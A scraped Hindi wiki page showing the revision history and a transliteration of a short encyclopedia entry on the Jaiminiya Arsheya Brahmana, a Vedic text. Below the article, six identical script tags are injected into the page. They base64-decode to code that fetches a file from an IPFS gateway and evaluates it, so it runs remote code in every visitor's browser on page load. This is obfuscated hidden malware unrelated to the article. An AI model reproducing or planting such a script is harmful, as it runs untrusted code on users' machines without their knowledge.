Difference between revisions of "जैमिनीयार्षेय ब्राह्मण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - 'पनिषद्' to 'पनिषद')
 
 
(11 intermediate revisions by 5 users not shown)
Line 1: Line 1:
{{Menu}}
+
जैमिनीयार्षेय ब्राह्मण [[जैमिनीयोपनिषद ब्राह्मण]] के साथ डॉ. बी. आर. शर्मा के द्वारा सम्पादित होकर तिरुपति से 1967 में प्रकाशित हुआ है। कौथुमशाखीय [[आर्षेय ब्राह्मण]] के सदृश इसके आरम्भ में भी, प्रथम दो वाक्य छोड़कर स्वाध्याय तथा यज्ञ की दृष्टि से [[ॠषि]], छन्द और [[देवता]] के ज्ञान पर बल दिया गया है। कौथुमशाखीय आर्षेय ब्राह्मण के आरम्भ में '''अथ खल्वयमार्षप्रदेश: भवति''' मिलता है, जो इसमें अनुल्लिखित है। वर्ण्य-विषय दोनों का समान है। ग्रामगेयगानों के  ॠषि-निरूपण में अध्यायों और खण्डों की व्यवस्था और विन्यास भी प्राय: समान है। कहीं-कहीं दोनों शाखाओं की संहिताओं में उपलब्ध अन्तर के कारण गानों के क्रम में भिन्नता है। कौथुमशाखीय आर्षेय ब्राह्मण में वैकल्पिक नाम भी दिये गये हैं, जबकि इसमें वे अनुपलब्ध हैं। इस प्रकार कौथुम की अपेक्षा यह कुछ संक्षिप्त-सा है।
==जैमिनीयार्षेय ब्राह्मण==
 
जैमिनीयार्षेय ब्राह्मण [[जैमिनीयोपनिषद ब्राह्मण]] के साथ डॉ॰ बी॰ आर॰ शर्मा के द्वारा सम्पादित होकर तिरुपति से 1967 में प्रकाशित हुआ है। कौथुमशाखीय [[आर्षेय ब्राह्मण]] के सदृश इसके आरम्भ में भी, प्रथम दो वाक्य छोड़कर स्वाध्याय तथा यज्ञ की दृष्टि से [[ॠषि]], छन्द और [[देवता]] के ज्ञान पर बल दिया गया है। कौथुमशाखीय आर्षेय ब्राह्मण के आरम्भ में '''अथ खल्वयमार्षप्रदेश: भवति''' मिलता है, जो इसमें अनुल्लिखित है। वर्ण्य-विषय दोनों का समान है। ग्रामगेयगानों के  [[ॠषि]]-निरूपण में अध्यायों और खण्डों की व्यवस्था और विन्यास भी प्राय: समान है। कहीं-कहीं दोनों शाखाओं की संहिताओं में उपलब्ध अन्तर के कारण गानों के क्रम में भिन्नता है। कौथुमशाखीय आर्षेय ब्राह्मण में वैकल्पिक नाम भी दिये गये हैं, जबकि इसमें वे अनुपलब्ध हैं। इस प्रकार कौथुम की अपेक्षा यह कुछ संक्षिप्त-सा है।
 
 
===विस्तार में देखें:- [[जैमिनिशाखीय ब्राह्मण]]===
 
===विस्तार में देखें:- [[जैमिनिशाखीय ब्राह्मण]]===
[[Category:कोश]]
+
{{प्रचार}}
[[Category:ब्राह्मण_ग्रन्थ]]
+
[[Category:पौराणिक कोश]] [[Category:दर्शन कोश]]
 +
[[Category:ब्राह्मण ग्रन्थ]][[Category:संस्कृत साहित्य]]
 +
==संबंधित लेख==
 +
{{ब्राह्मण साहित्य2}}
 +
{{संस्कृत साहित्य}}
 
{{ब्राह्मण साहित्य}}
 
{{ब्राह्मण साहित्य}}
 
__INDEX__
 
__INDEX__

Latest revision as of 06:46, 14 October 2011

jaiminiyarshey brahman jaiminiyopanishad brahman ke sath d aau. bi. ar. sharma ke dvara sampadit hokar tirupati se 1967 mean prakashit hua hai. kauthumashakhiy arshey brahman ke sadrish isake arambh mean bhi, pratham do vaky chho dakar svadhyay tatha yajn ki drishti se rrishi, chhand aur devata ke jnan par bal diya gaya hai. kauthumashakhiy arshey brahman ke arambh mean ath khalvayamarshapradesh: bhavati milata hai, jo isamean anullikhit hai. varny-vishay donoan ka saman hai. gramageyaganoan ke rrishi-niroopan mean adhyayoan aur khandoan ki vyavastha aur vinyas bhi pray: saman hai. kahian-kahian donoan shakhaoan ki sanhitaoan mean upalabdh antar ke karan ganoan ke kram mean bhinnata hai. kauthumashakhiy arshey brahman mean vaikalpik nam bhi diye gaye haian, jabaki isamean ve anupalabdh haian. is prakar kauthum ki apeksha yah kuchh sankshipt-sa hai.

vistar mean dekhean:- jaiminishakhiy brahman

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shrutiyaan
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>